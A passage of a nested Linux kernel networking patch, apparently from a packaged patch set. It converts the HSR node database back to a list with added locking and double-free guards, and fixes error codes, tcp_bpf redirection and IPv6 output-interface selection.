+-	struct hlist_node *tmp;
++	struct hsr_node *tmp;
+ 
+-	hlist_for_each_entry_safe(node, tmp, node_db, mac_list)
+-		kfree_rcu(node, rcu_head);
++	list_for_each_entry_safe(node, tmp, node_db, mac_list)
++		kfree(node);
+ }
+ 
+ void prp_handle_san_frame(bool san, enum hsr_port_type port,
+@@ -168,7 +143,7 @@ void prp_handle_san_frame(bool san, enum hsr_port_type port,
+  * originating from the newly added node.
+  */
+ static struct hsr_node *hsr_add_node(struct hsr_priv *hsr,
+-				     struct hlist_head *node_db,
++				     struct list_head *node_db,
+ 				     unsigned char addr[],
+ 				     u16 seq_out, bool san,
+ 				     enum hsr_port_type rx_port)
+@@ -182,6 +157,7 @@ static struct hsr_node *hsr_add_node(struct hsr_priv *hsr,
+ 		return NULL;
+ 
+ 	ether_addr_copy(new_node->macaddress_A, addr);
++	spin_lock_init(&new_node->seq_out_lock);
+ 
+ 	/* We are only interested in time diffs here, so use current jiffies
+ 	 * as initialization. (0 could trigger an spurious ring error warning).
+@@ -198,14 +174,14 @@ static struct hsr_node *hsr_add_node(struct hsr_priv *hsr,
+ 		hsr->proto_ops->handle_san_frame(san, rx_port, new_node);
+ 
+ 	spin_lock_bh(&hsr->list_lock);
+-	hlist_for_each_entry_rcu(node, node_db, mac_list,
+-				 lockdep_hsr_is_held(&hsr->list_lock)) {
++	list_for_each_entry_rcu(node, node_db, mac_list,
++				lockdep_is_held(&hsr->list_lock)) {
+ 		if (ether_addr_equal(node->macaddress_A, addr))
+ 			goto out;
+ 		if (ether_addr_equal(node->macaddress_B, addr))
+ 			goto out;
+ 	}
+-	hlist_add_tail_rcu(&new_node->mac_list, node_db);
++	list_add_tail_rcu(&new_node->mac_list, node_db);
+ 	spin_unlock_bh(&hsr->list_lock);
+ 	return new_node;
+ out:
+@@ -225,7 +201,7 @@ void prp_update_san_info(struct hsr_node *node, bool is_sup)
+ 
+ /* Get the hsr_node from which 'skb' was sent.
+  */
+-struct hsr_node *hsr_get_node(struct hsr_port *port, struct hlist_head *node_db,
++struct hsr_node *hsr_get_node(struct hsr_port *port, struct list_head *node_db,
+ 			      struct sk_buff *skb, bool is_sup,
+ 			      enum hsr_port_type rx_port)
+ {
+@@ -241,7 +217,7 @@ struct hsr_node *hsr_get_node(struct hsr_port *port, struct hlist_head *node_db,
+ 
+ 	ethhdr = (struct ethhdr *)skb_mac_header(skb);
+ 
+-	hlist_for_each_entry_rcu(node, node_db, mac_list) {
++	list_for_each_entry_rcu(node, node_db, mac_list) {
+ 		if (ether_addr_equal(node->macaddress_A, ethhdr->h_source)) {
+ 			if (hsr->proto_ops->update_san_info)
+ 				hsr->proto_ops->update_san_info(node, is_sup);
+@@ -291,12 +267,11 @@ void hsr_handle_sup_frame(struct hsr_frame_info *frame)
+ 	struct hsr_sup_tlv *hsr_sup_tlv;
+ 	struct hsr_node *node_real;
+ 	struct sk_buff *skb = NULL;
+-	struct hlist_head *node_db;
++	struct list_head *node_db;
+ 	struct ethhdr *ethhdr;
+ 	int i;
+ 	unsigned int pull_size = 0;
+ 	unsigned int total_pull_size = 0;
+-	u32 hash;
+ 
+ 	/* Here either frame->skb_hsr or frame->skb_prp should be
+ 	 * valid as supervision frame always will have protocol
+@@ -334,13 +309,11 @@ void hsr_handle_sup_frame(struct hsr_frame_info *frame)
+ 	hsr_sp = (struct hsr_sup_payload *)skb->data;
+ 
+ 	/* Merge node_curr (registered on macaddress_B) into node_real */
+-	node_db = port_rcv->hsr->node_db;
+-	hash = hsr_mac_hash(hsr, hsr_sp->macaddress_A);
+-	node_real = find_node_by_addr_A(&node_db[hash], hsr_sp->macaddress_A);
++	node_db = &port_rcv->hsr->node_db;
++	node_real = find_node_by_addr_A(node_db, hsr_sp->macaddress_A);
+ 	if (!node_real)
+ 		/* No frame received from AddrA of this node yet */
+-		node_real = hsr_add_node(hsr, &node_db[hash],
+-					 hsr_sp->macaddress_A,
++		node_real = hsr_add_node(hsr, node_db, hsr_sp->macaddress_A,
+ 					 HSR_SEQNR_START - 1, true,
+ 					 port_rcv->type);
+ 	if (!node_real)
+@@ -374,14 +347,14 @@ void hsr_handle_sup_frame(struct hsr_frame_info *frame)
+ 		hsr_sp = (struct hsr_sup_payload *)skb->data;
+ 
+ 		/* Check if redbox mac and node mac are equal. */
+-		if (!ether_addr_equal(node_real->macaddress_A,
+-				      hsr_sp->macaddress_A)) {
++		if (!ether_addr_equal(node_real->macaddress_A, hsr_sp->macaddress_A)) {
+ 			/* This is a redbox supervision frame for a VDAN! */
+ 			goto done;
+ 		}
+ 	}
+ 
+ 	ether_addr_copy(node_real->macaddress_B, ethhdr->h_source);
++	spin_lock_bh(&node_real->seq_out_lock);
+ 	for (i = 0; i < HSR_PT_PORTS; i++) {
+ 		if (!node_curr->time_in_stale[i] &&
+ 		    time_after(node_curr->time_in[i], node_real->time_in[i])) {
+@@ -392,12 +365,16 @@ void hsr_handle_sup_frame(struct hsr_frame_info *frame)
+ 		if (seq_nr_after(node_curr->seq_out[i], node_real->seq_out[i]))
+ 			node_real->seq_out[i] = node_curr->seq_out[i];
+ 	}
++	spin_unlock_bh(&node_real->seq_out_lock);
+ 	node_real->addr_B_port = port_rcv->type;
+ 
+ 	spin_lock_bh(&hsr->list_lock);
+-	hlist_del_rcu(&node_curr->mac_list);
++	if (!node_curr->removed) {
++		list_del_rcu(&node_curr->mac_list);
++		node_curr->removed = true;
++		kfree_rcu(node_curr, rcu_head);
++	}
+ 	spin_unlock_bh(&hsr->list_lock);
+-	kfree_rcu(node_curr, rcu_head);
+ 
+ done:
+ 	/* Push back here */
+@@ -433,7 +410,6 @@ void hsr_addr_subst_dest(struct hsr_node *node_src, struct sk_buff *skb,
+ 			 struct hsr_port *port)
+ {
+ 	struct hsr_node *node_dst;
+-	u32 hash;
+ 
+ 	if (!skb_mac_header_was_set(skb)) {
+ 		WARN_ONCE(1, "%s: Mac header not set\n", __func__);
+@@ -443,8 +419,7 @@ void hsr_addr_subst_dest(struct hsr_node *node_src, struct sk_buff *skb,
+ 	if (!is_unicast_ether_addr(eth_hdr(skb)->h_dest))
+ 		return;
+ 
+-	hash = hsr_mac_hash(port->hsr, eth_hdr(skb)->h_dest);
+-	node_dst = find_node_by_addr_A(&port->hsr->node_db[hash],
++	node_dst = find_node_by_addr_A(&port->hsr->node_db,
+ 				       eth_hdr(skb)->h_dest);
+ 	if (!node_dst) {
+ 		if (net_ratelimit())
+@@ -484,13 +459,17 @@ void hsr_register_frame_in(struct hsr_node *node, struct hsr_port *port,
+ int hsr_register_frame_out(struct hsr_port *port, struct hsr_node *node,
+ 			   u16 sequence_nr)
+ {
++	spin_lock_bh(&node->seq_out_lock);
+ 	if (seq_nr_before_or_eq(sequence_nr, node->seq_out[port->type]) &&
+ 	    time_is_after_jiffies(node->time_out[port->type] +
+-	    msecs_to_jiffies(HSR_ENTRY_FORGET_TIME)))
++	    msecs_to_jiffies(HSR_ENTRY_FORGET_TIME))) {
++		spin_unlock_bh(&node->seq_out_lock);
+ 		return 1;
++	}
+ 
+ 	node->time_out[port->type] = jiffies;
+ 	node->seq_out[port->type] = sequence_nr;
++	spin_unlock_bh(&node->seq_out_lock);
+ 	return 0;
+ }
+ 
+@@ -520,71 +499,60 @@ static struct hsr_port *get_late_port(struct hsr_priv *hsr,
+ void hsr_prune_nodes(struct timer_list *t)
+ {
+ 	struct hsr_priv *hsr = from_timer(hsr, t, prune_timer);
+-	struct hlist_node *tmp;
+ 	struct hsr_node *node;
++	struct hsr_node *tmp;
+ 	struct hsr_port *port;
+ 	unsigned long timestamp;
+ 	unsigned long time_a, time_b;
+-	int i;
+ 
+ 	spin_lock_bh(&hsr->list_lock);
++	list_for_each_entry_safe(node, tmp, &hsr->node_db, mac_list) {
++		/* Don't prune own node. Neither time_in[HSR_PT_SLAVE_A]
++		 * nor time_in[HSR_PT_SLAVE_B], will ever be updated for
++		 * the master port. Thus the master node will be repeatedly
++		 * pruned leading to packet loss.
++		 */
++		if (hsr_addr_is_self(hsr, node->macaddress_A))
++			continue;
++
++		/* Shorthand */
++		time_a = node->time_in[HSR_PT_SLAVE_A];
++		time_b = node->time_in[HSR_PT_SLAVE_B];
++
++		/* Check for timestamps old enough to risk wrap-around */
++		if (time_after(jiffies, time_a + MAX_JIFFY_OFFSET / 2))
++			node->time_in_stale[HSR_PT_SLAVE_A] = true;
++		if (time_after(jiffies, time_b + MAX_JIFFY_OFFSET / 2))
++			node->time_in_stale[HSR_PT_SLAVE_B] = true;
++
++		/* Get age of newest frame from node.
++		 * At least one time_in is OK here; nodes get pruned long
++		 * before both time_ins can get stale
++		 */
++		timestamp = time_a;
++		if (node->time_in_stale[HSR_PT_SLAVE_A] ||
++		    (!node->time_in_stale[HSR_PT_SLAVE_B] &&
++		    time_after(time_b, time_a)))
++			timestamp = time_b;
++
++		/* Warn of ring error only as long as we get frames at all */
++		if (time_is_after_jiffies(timestamp +
++				msecs_to_jiffies(1.5 * MAX_SLAVE_DIFF))) {
++			rcu_read_lock();
++			port = get_late_port(hsr, node);
++			if (port)
++				hsr_nl_ringerror(hsr, node->macaddress_A, port);
++			rcu_read_unlock();
++		}
+ 
+-	for (i = 0; i < hsr->hash_buckets; i++) {
+-		hlist_for_each_entry_safe(node, tmp, &hsr->node_db[i],
+-					  mac_list) {
+-			/* Don't prune own node.
+-			 * Neither time_in[HSR_PT_SLAVE_A]
+-			 * nor time_in[HSR_PT_SLAVE_B], will ever be updated
+-			 * for the master port. Thus the master node will be
+-			 * repeatedly pruned leading to packet loss.
+-			 */
+-			if (hsr_addr_is_self(hsr, node->macaddress_A))
+-				continue;
+-
+-			/* Shorthand */
+-			time_a = node->time_in[HSR_PT_SLAVE_A];
+-			time_b = node->time_in[HSR_PT_SLAVE_B];
+-
+-			/* Check for timestamps old enough to
+-			 * risk wrap-around
+-			 */
+-			if (time_after(jiffies, time_a + MAX_JIFFY_OFFSET / 2))
+-				node->time_in_stale[HSR_PT_SLAVE_A] = true;
+-			if (time_after(jiffies, time_b + MAX_JIFFY_OFFSET / 2))
+-				node->time_in_stale[HSR_PT_SLAVE_B] = true;
+-
+-			/* Get age of newest frame from node.
+-			 * At least one time_in is OK here; nodes get pruned
+-			 * long before both time_ins can get stale
+-			 */
+-			timestamp = time_a;
+-			if (node->time_in_stale[HSR_PT_SLAVE_A] ||
+-			    (!node->time_in_stale[HSR_PT_SLAVE_B] &&
+-			     time_after(time_b, time_a)))
+-				timestamp = time_b;
+-
+-			/* Warn of ring error only as long as we get
+-			 * frames at all
+-			 */
+-			if (time_is_after_jiffies(timestamp +
+-						  msecs_to_jiffies(1.5 * MAX_SLAVE_DIFF))) {
+-				rcu_read_lock();
+-				port = get_late_port(hsr, node);
+-				if (port)
+-					hsr_nl_ringerror(hsr,
+-							 node->macaddress_A,
+-							 port);
+-				rcu_read_unlock();
+-			}
+-
+-			/* Prune old entries */
+-			if (time_is_before_jiffies(timestamp +
+-						   msecs_to_jiffies(HSR_NODE_FORGET_TIME))) {
+-				hsr_nl_nodedown(hsr, node->macaddress_A);
+-				hlist_del_rcu(&node->mac_list);
+-				/* Note that we need to free this
+-				 * entry later:
+-				 */
++		/* Prune old entries */
++		if (time_is_before_jiffies(timestamp +
++				msecs_to_jiffies(HSR_NODE_FORGET_TIME))) {
++			hsr_nl_nodedown(hsr, node->macaddress_A);
++			if (!node->removed) {
++				list_del_rcu(&node->mac_list);
++				node->removed = true;
++				/* Note that we need to free this entry later: */
+ 				kfree_rcu(node, rcu_head);
+ 			}
+ 		}
+@@ -600,20 +568,17 @@ void *hsr_get_next_node(struct hsr_priv *hsr, void *_pos,
+ 			unsigned char addr[ETH_ALEN])
+ {
+ 	struct hsr_node *node;
+-	u32 hash;
+-
+-	hash = hsr_mac_hash(hsr, addr);
+ 
+ 	if (!_pos) {
+-		node = hsr_node_get_first(&hsr->node_db[hash],
+-					  &hsr->list_lock);
++		node = list_first_or_null_rcu(&hsr->node_db,
++					      struct hsr_node, mac_list);
+ 		if (node)
+ 			ether_addr_copy(addr, node->macaddress_A);
+ 		return node;
+ 	}
+ 
+ 	node = _pos;
+-	hlist_for_each_entry_continue_rcu(node, mac_list) {
++	list_for_each_entry_continue_rcu(node, &hsr->node_db, mac_list) {
+ 		ether_addr_copy(addr, node->macaddress_A);
+ 		return node;
+ 	}
+@@ -633,11 +598,8 @@ int hsr_get_node_data(struct hsr_priv *hsr,
+ 	struct hsr_node *node;
+ 	struct hsr_port *port;
+ 	unsigned long tdiff;
+-	u32 hash;
+-
+-	hash = hsr_mac_hash(hsr, addr);
+ 
+-	node = find_node_by_addr_A(&hsr->node_db[hash], addr);
++	node = find_node_by_addr_A(&hsr->node_db, addr);
+ 	if (!node)
+ 		return -ENOENT;
+ 
+diff --git a/net/hsr/hsr_framereg.h b/net/hsr/hsr_framereg.h
+index f3762e9e42b54..b23556251d621 100644
+--- a/net/hsr/hsr_framereg.h
++++ b/net/hsr/hsr_framereg.h
+@@ -28,17 +28,9 @@ struct hsr_frame_info {
+ 	bool is_from_san;
+ };
+ 
+-#ifdef CONFIG_LOCKDEP
+-int lockdep_hsr_is_held(spinlock_t *lock);
+-#else
+-#define lockdep_hsr_is_held(lock)	1
+-#endif
+-
+-u32 hsr_mac_hash(struct hsr_priv *hsr, const unsigned char *addr);
+-struct hsr_node *hsr_node_get_first(struct hlist_head *head, spinlock_t *lock);
+ void hsr_del_self_node(struct hsr_priv *hsr);
+-void hsr_del_nodes(struct hlist_head *node_db);
+-struct hsr_node *hsr_get_node(struct hsr_port *port, struct hlist_head *node_db,
++void hsr_del_nodes(struct list_head *node_db);
++struct hsr_node *hsr_get_node(struct hsr_port *port, struct list_head *node_db,
+ 			      struct sk_buff *skb, bool is_sup,
+ 			      enum hsr_port_type rx_port);
+ void hsr_handle_sup_frame(struct hsr_frame_info *frame);
+@@ -76,7 +68,9 @@ void prp_handle_san_frame(bool san, enum hsr_port_type port,
+ void prp_update_san_info(struct hsr_node *node, bool is_sup);
+ 
+ struct hsr_node {
+-	struct hlist_node	mac_list;
++	struct list_head	mac_list;
++	/* Protect R/W access to seq_out */
++	spinlock_t		seq_out_lock;
+ 	unsigned char		macaddress_A[ETH_ALEN];
+ 	unsigned char		macaddress_B[ETH_ALEN];
+ 	/* Local slave through which AddrB frames are received from this node */
+@@ -88,6 +82,7 @@ struct hsr_node {
+ 	bool			san_a;
+ 	bool			san_b;
+ 	u16			seq_out[HSR_PT_PORTS];
++	bool			removed;
+ 	struct rcu_head		rcu_head;
+ };
+ 
+diff --git a/net/hsr/hsr_main.h b/net/hsr/hsr_main.h
+index b158ba409f9a4..16ae9fb09ccd2 100644
+--- a/net/hsr/hsr_main.h
++++ b/net/hsr/hsr_main.h
+@@ -47,9 +47,6 @@
+ 
+ #define HSR_V1_SUP_LSDUSIZE		52
+ 
+-#define HSR_HSIZE_SHIFT	8
+-#define HSR_HSIZE	BIT(HSR_HSIZE_SHIFT)
+-
+ /* The helper functions below assumes that 'path' occupies the 4 most
+  * significant bits of the 16-bit field shared by 'path' and 'LSDU_size' (or
+  * equivalently, the 4 most significant bits of HSR tag byte 14).
+@@ -188,8 +185,8 @@ struct hsr_proto_ops {
+ struct hsr_priv {
+ 	struct rcu_head		rcu_head;
+ 	struct list_head	ports;
+-	struct hlist_head	node_db[HSR_HSIZE];	/* Known HSR nodes */
+-	struct hlist_head	self_node_db;	/* MACs of slaves */
++	struct list_head	node_db;	/* Known HSR nodes */
++	struct list_head	self_node_db;	/* MACs of slaves */
+ 	struct timer_list	announce_timer;	/* Supervision frame dispatch */
+ 	struct timer_list	prune_timer;
+ 	int announce_count;
+@@ -199,8 +196,6 @@ struct hsr_priv {
+ 	spinlock_t seqnr_lock;	/* locking for sequence_nr */
+ 	spinlock_t list_lock;	/* locking for node list */
+ 	struct hsr_proto_ops	*proto_ops;
+-	u32 hash_buckets;
+-	u32 hash_seed;
+ #define PRP_LAN_ID	0x5     /* 0x1010 for A and 0x1011 for B. Bit 0 is set
+ 				 * based on SLAVE_A or SLAVE_B
+ 				 */
+diff --git a/net/hsr/hsr_netlink.c b/net/hsr/hsr_netlink.c
+index 7174a90929002..78fe40eb9f012 100644
+--- a/net/hsr/hsr_netlink.c
++++ b/net/hsr/hsr_netlink.c
+@@ -105,7 +105,6 @@ static int hsr_newlink(struct net *src_net, struct net_device *dev,
+ static void hsr_dellink(struct net_device *dev, struct list_head *head)
+ {
+ 	struct hsr_priv *hsr = netdev_priv(dev);
+-	int i;
+ 
+ 	del_timer_sync(&hsr->prune_timer);
+ 	del_timer_sync(&hsr->announce_timer);
+@@ -114,8 +113,7 @@ static void hsr_dellink(struct net_device *dev, struct list_head *head)
+ 	hsr_del_ports(hsr);
+ 
+ 	hsr_del_self_node(hsr);
+-	for (i = 0; i < hsr->hash_buckets; i++)
+-		hsr_del_nodes(&hsr->node_db[i]);
++	hsr_del_nodes(&hsr->node_db);
+ 
+ 	unregister_netdevice_queue(dev, head);
+ }
+diff --git a/net/ipv4/af_inet.c b/net/ipv4/af_inet.c
+index 0da6794113308..92d4237862518 100644
+--- a/net/ipv4/af_inet.c
++++ b/net/ipv4/af_inet.c
+@@ -522,9 +522,9 @@ int __inet_bind(struct sock *sk, struct sockaddr *uaddr, int addr_len,
+ 	/* Make sure we are allowed to bind here. */
+ 	if (snum || !(inet->bind_address_no_port ||
+ 		      (flags & BIND_FORCE_ADDRESS_NO_PORT))) {
+-		if (sk->sk_prot->get_port(sk, snum)) {
++		err = sk->sk_prot->get_port(sk, snum);
++		if (err) {
+ 			inet->inet_saddr = inet->inet_rcv_saddr = 0;
+-			err = -EADDRINUSE;
+ 			goto out_release_sock;
+ 		}
+ 		if (!(flags & BIND_FROM_BPF)) {
+diff --git a/net/ipv4/inet_connection_sock.c b/net/ipv4/inet_connection_sock.c
+index 4e84ed21d16fe..4a34bc7cb15ed 100644
+--- a/net/ipv4/inet_connection_sock.c
++++ b/net/ipv4/inet_connection_sock.c
+@@ -471,11 +471,11 @@ int inet_csk_get_port(struct sock *sk, unsigned short snum)
+ 	bool reuse = sk->sk_reuse && sk->sk_state != TCP_LISTEN;
+ 	bool found_port = false, check_bind_conflict = true;
+ 	bool bhash_created = false, bhash2_created = false;
++	int ret = -EADDRINUSE, port = snum, l3mdev;
+ 	struct inet_bind_hashbucket *head, *head2;
+ 	struct inet_bind2_bucket *tb2 = NULL;
+ 	struct inet_bind_bucket *tb = NULL;
+ 	bool head2_lock_acquired = false;
+-	int ret = 1, port = snum, l3mdev;
+ 	struct net *net = sock_net(sk);
+ 
+ 	l3mdev = inet_sk_bound_l3mdev(sk);
+@@ -1186,7 +1186,7 @@ int inet_csk_listen_start(struct sock *sk)
+ {
+ 	struct inet_connection_sock *icsk = inet_csk(sk);
+ 	struct inet_sock *inet = inet_sk(sk);
+-	int err = -EADDRINUSE;
++	int err;
+ 
+ 	reqsk_queue_alloc(&icsk->icsk_accept_queue);
+ 
+@@ -1202,7 +1202,8 @@ int inet_csk_listen_start(struct sock *sk)
+ 	 * after validation is complete.
+ 	 */
+ 	inet_sk_state_store(sk, TCP_LISTEN);
+-	if (!sk->sk_prot->get_port(sk, inet->inet_num)) {
++	err = sk->sk_prot->get_port(sk, inet->inet_num);
++	if (!err) {
+ 		inet->inet_sport = htons(inet->inet_num);
+ 
+ 		sk_dst_reset(sk);
+diff --git a/net/ipv4/ping.c b/net/ipv4/ping.c
+index 04b4ec07bb06c..409ec2a1f95b0 100644
+--- a/net/ipv4/ping.c
++++ b/net/ipv4/ping.c
+@@ -143,7 +143,7 @@ next_port:
+ 
+ fail:
+ 	spin_unlock(&ping_table.lock);
+-	return 1;
++	return -EADDRINUSE;
+ }
+ EXPORT_SYMBOL_GPL(ping_get_port);
+ 
+diff --git a/net/ipv4/tcp_bpf.c b/net/ipv4/tcp_bpf.c
+index cf9c3e8f7ccbf..94aad3870c5fc 100644
+--- a/net/ipv4/tcp_bpf.c
++++ b/net/ipv4/tcp_bpf.c
+@@ -45,8 +45,11 @@ static int bpf_tcp_ingress(struct sock *sk, struct sk_psock *psock,
+ 		tmp->sg.end = i;
+ 		if (apply) {
+ 			apply_bytes -= size;
+-			if (!apply_bytes)
++			if (!apply_bytes) {
++				if (sge->length)
++					sk_msg_iter_var_prev(i);
+ 				break;
++			}
+ 		}
+ 	} while (i != msg->sg.end);
+ 
+@@ -131,10 +134,9 @@ static int tcp_bpf_push_locked(struct sock *sk, struct sk_msg *msg,
+ 	return ret;
+ }
+ 
+-int tcp_bpf_sendmsg_redir(struct sock *sk, struct sk_msg *msg,
+-			  u32 bytes, int flags)
++int tcp_bpf_sendmsg_redir(struct sock *sk, bool ingress,
++			  struct sk_msg *msg, u32 bytes, int flags)
+ {
+-	bool ingress = sk_msg_to_ingress(msg);
+ 	struct sk_psock *psock = sk_psock_get(sk);
+ 	int ret;
+ 
+@@ -276,10 +278,10 @@ msg_bytes_ready:
+ static int tcp_bpf_send_verdict(struct sock *sk, struct sk_psock *psock,
+ 				struct sk_msg *msg, int *copied, int flags)
+ {
+-	bool cork = false, enospc = sk_msg_full(msg);
++	bool cork = false, enospc = sk_msg_full(msg), redir_ingress;
+ 	struct sock *sk_redir;
+ 	u32 tosend, origsize, sent, delta = 0;
+-	u32 eval = __SK_NONE;
++	u32 eval;
+ 	int ret;
+ 
+ more_data:
+@@ -310,6 +312,7 @@ more_data:
+ 	tosend = msg->sg.size;
+ 	if (psock->apply_bytes && psock->apply_bytes < tosend)
+ 		tosend = psock->apply_bytes;
++	eval = __SK_NONE;
+ 
+ 	switch (psock->eval) {
+ 	case __SK_PASS:
+@@ -321,6 +324,7 @@ more_data:
+ 		sk_msg_apply_bytes(psock, tosend);
+ 		break;
+ 	case __SK_REDIRECT:
++		redir_ingress = psock->redir_ingress;
+ 		sk_redir = psock->sk_redir;
+ 		sk_msg_apply_bytes(psock, tosend);
+ 		if (!psock->apply_bytes) {
+@@ -337,7 +341,8 @@ more_data:
+ 		release_sock(sk);
+ 
+ 		origsize = msg->sg.size;
+-		ret = tcp_bpf_sendmsg_redir(sk_redir, msg, tosend, flags);
++		ret = tcp_bpf_sendmsg_redir(sk_redir, redir_ingress,
++					    msg, tosend, flags);
+ 		sent = origsize - msg->sg.size;
+ 
+ 		if (eval == __SK_REDIRECT)
+diff --git a/net/ipv4/udp.c b/net/ipv4/udp.c
+index 6a320a614e547..2eaf47e23b221 100644
+--- a/net/ipv4/udp.c
++++ b/net/ipv4/udp.c
+@@ -232,16 +232,16 @@ static int udp_reuseport_add_sock(struct sock *sk, struct udp_hslot *hslot)
+ int udp_lib_get_port(struct sock *sk, unsigned short snum,
+ 		     unsigned int hash2_nulladdr)
+ {
+-	struct udp_hslot *hslot, *hslot2;
+ 	struct udp_table *udptable = sk->sk_prot->h.udp_table;
+-	int    error = 1;
++	struct udp_hslot *hslot, *hslot2;
+ 	struct net *net = sock_net(sk);
++	int error = -EADDRINUSE;
+ 
+ 	if (!snum) {
++		DECLARE_BITMAP(bitmap, PORTS_PER_CHAIN);
++		unsigned short first, last;
+ 		int low, high, remaining;
+ 		unsigned int rand;
+-		unsigned short first, last;
+-		DECLARE_BITMAP(bitmap, PORTS_PER_CHAIN);
+ 
+ 		inet_get_local_port_range(net, &low, &high);
+ 		remaining = (high - low) + 1;
+@@ -2518,10 +2518,13 @@ static struct sock *__udp4_lib_mcast_demux_lookup(struct net *net,
+ 						  __be16 rmt_port, __be32 rmt_addr,
+ 						  int dif, int sdif)
+ {
+-	struct sock *sk, *result;
+ 	unsigned short hnum = ntohs(loc_port);
+-	unsigned int slot = udp_hashfn(net, hnum, udp_table.mask);
+-	struct udp_hslot *hslot = &udp_table.hash[slot];
++	struct sock *sk, *result;
++	struct udp_hslot *hslot;
++	unsigned int slot;
++
++	slot = udp_hashfn(net, hnum, udp_table.mask);
++	hslot = &udp_table.hash[slot];
+ 
+ 	/* Do not bother scanning a too big list */
+ 	if (hslot->count > 10)
+@@ -2549,14 +2552,18 @@ static struct sock *__udp4_lib_demux_lookup(struct net *net,
+ 					    __be16 rmt_port, __be32 rmt_addr,
+ 					    int dif, int sdif)
+ {
+-	unsigned short hnum = ntohs(loc_port);
+-	unsigned int hash2 = ipv4_portaddr_hash(net, loc_addr, hnum);
+-	unsigned int slot2 = hash2 & udp_table.mask;
+-	struct udp_hslot *hslot2 = &udp_table.hash2[slot2];
+ 	INET_ADDR_COOKIE(acookie, rmt_addr, loc_addr);
+-	const __portpair ports = INET_COMBINED_PORTS(rmt_port, hnum);
++	unsigned short hnum = ntohs(loc_port);
++	unsigned int hash2, slot2;
++	struct udp_hslot *hslot2;
++	__portpair ports;
+ 	struct sock *sk;
+ 
++	hash2 = ipv4_portaddr_hash(net, loc_addr, hnum);
++	slot2 = hash2 & udp_table.mask;
++	hslot2 = &udp_table.hash2[slot2];
++	ports = INET_COMBINED_PORTS(rmt_port, hnum);
++
+ 	udp_portaddr_for_each_entry_rcu(sk, &hslot2->head) {
+ 		if (inet_match(net, sk, acookie, ports, dif, sdif))
+ 			return sk;
+@@ -2957,10 +2964,10 @@ EXPORT_SYMBOL(udp_prot);
+ 
+ static struct sock *udp_get_first(struct seq_file *seq, int start)
+ {
+-	struct sock *sk;
+-	struct udp_seq_afinfo *afinfo;
+ 	struct udp_iter_state *state = seq->private;
+ 	struct net *net = seq_file_net(seq);
++	struct udp_seq_afinfo *afinfo;
++	struct sock *sk;
+ 
+ 	if (state->bpf_seq_afinfo)
+ 		afinfo = state->bpf_seq_afinfo;
+@@ -2991,9 +2998,9 @@ found:
+ 
+ static struct sock *udp_get_next(struct seq_file *seq, struct sock *sk)
+ {
+-	struct udp_seq_afinfo *afinfo;
+ 	struct udp_iter_state *state = seq->private;
+ 	struct net *net = seq_file_net(seq);
++	struct udp_seq_afinfo *afinfo;
+ 
+ 	if (state->bpf_seq_afinfo)
+ 		afinfo = state->bpf_seq_afinfo;
+@@ -3049,8 +3056,8 @@ EXPORT_SYMBOL(udp_seq_next);
+ 
+ void udp_seq_stop(struct seq_file *seq, void *v)
+ {
+-	struct udp_seq_afinfo *afinfo;
+ 	struct udp_iter_state *state = seq->private;
++	struct udp_seq_afinfo *afinfo;
+ 
+ 	if (state->bpf_seq_afinfo)
+ 		afinfo = state->bpf_seq_afinfo;
+diff --git a/net/ipv4/udp_tunnel_core.c b/net/ipv4/udp_tunnel_core.c
+index 8242c8947340e..5f8104cf082d0 100644
+--- a/net/ipv4/udp_tunnel_core.c
++++ b/net/ipv4/udp_tunnel_core.c
+@@ -176,6 +176,7 @@ EXPORT_SYMBOL_GPL(udp_tunnel_xmit_skb);
+ void udp_tunnel_sock_release(struct socket *sock)
+ {
+ 	rcu_assign_sk_user_data(sock->sk, NULL);
++	synchronize_rcu();
+ 	kernel_sock_shutdown(sock, SHUT_RDWR);
+ 	sock_release(sock);
+ }
+diff --git a/net/ipv6/af_inet6.c b/net/ipv6/af_inet6.c
+index 0241910049825..7b0cd54da452b 100644
+--- a/net/ipv6/af_inet6.c
++++ b/net/ipv6/af_inet6.c
+@@ -409,10 +409,10 @@ static int __inet6_bind(struct sock *sk, struct sockaddr *uaddr, int addr_len,
+ 	/* Make sure we are allowed to bind here. */
+ 	if (snum || !(inet->bind_address_no_port ||
+ 		      (flags & BIND_FORCE_ADDRESS_NO_PORT))) {
+-		if (sk->sk_prot->get_port(sk, snum)) {
++		err = sk->sk_prot->get_port(sk, snum);
++		if (err) {
+ 			sk->sk_ipv6only = saved_ipv6only;
+ 			inet_reset_saddr(sk);
+-			err = -EADDRINUSE;
+ 			goto out;
+ 		}
+ 		if (!(flags & BIND_FROM_BPF)) {
+diff --git a/net/ipv6/datagram.c b/net/ipv6/datagram.c
+index 5ecb56522f9d6..ba28aeb7cade0 100644
+--- a/net/ipv6/datagram.c
++++ b/net/ipv6/datagram.c
+@@ -42,24 +42,29 @@ static void ip6_datagram_flow_key_init(struct flowi6 *fl6, struct sock *sk)
+ {
+ 	struct inet_sock *inet = inet_sk(sk);
+ 	struct ipv6_pinfo *np = inet6_sk(sk);
++	int oif = sk->sk_bound_dev_if;
+ 
+ 	memset(fl6, 0, sizeof(*fl6));
+ 	fl6->flowi6_proto = sk->sk_protocol;
+ 	fl6->daddr = sk->sk_v6_daddr;
+ 	fl6->saddr = np->saddr;
+-	fl6->flowi6_oif = sk->sk_bound_dev_if;
+ 	fl6->flowi6_mark = sk->sk_mark;
+ 	fl6->fl6_dport = inet->inet_dport;
+ 	fl6->fl6_sport = inet->inet_sport;
+ 	fl6->flowlabel = np->flow_label;
+ 	fl6->flowi6_uid = sk->sk_uid;
+ 
+-	if (!fl6->flowi6_oif)
+-		fl6->flowi6_oif = np->sticky_pktinfo.ipi6_ifindex;
++	if (!oif)
++		oif = np->sticky_pktinfo.ipi6_ifindex;
+ 
+-	if (!fl6->flowi6_oif && ipv6_addr_is_multicast(&fl6->daddr))
+-		fl6->flowi6_oif = np->mcast_oif;
++	if (!oif) {
++		if (ipv6_addr_is_multicast(&fl6->daddr))
++			oif = np->mcast_oif;
++		else
++			oif = np->ucast_oif;
++	}
+ 
++	fl6->flowi6_oif = oif;
+ 	security_sk_classify_flow(sk, flowi6_to_flowi_common(fl6));
+ }
+ 
+diff --git a/net/ipv6/sit.c b/net/ipv6/sit.c
+index 5703d3cbea9ba..70d81bba50939 100644
+--- a/net/ipv6/sit.c
++++ b/net/ipv6/sit.c
+@@ -694,7 +694,7 @@ static int ipip6_rcv(struct sk_buff *skb)
+ 		skb->dev = tunnel->dev;
+ 
+ 		if (packet_is_spoofed(skb, iph, tunnel)) {
+-			tunnel->dev->stats.rx_errors++;
++			DEV_STATS_INC(tunnel->dev, rx_errors);
+ 			goto out;
+ 		}
+ 
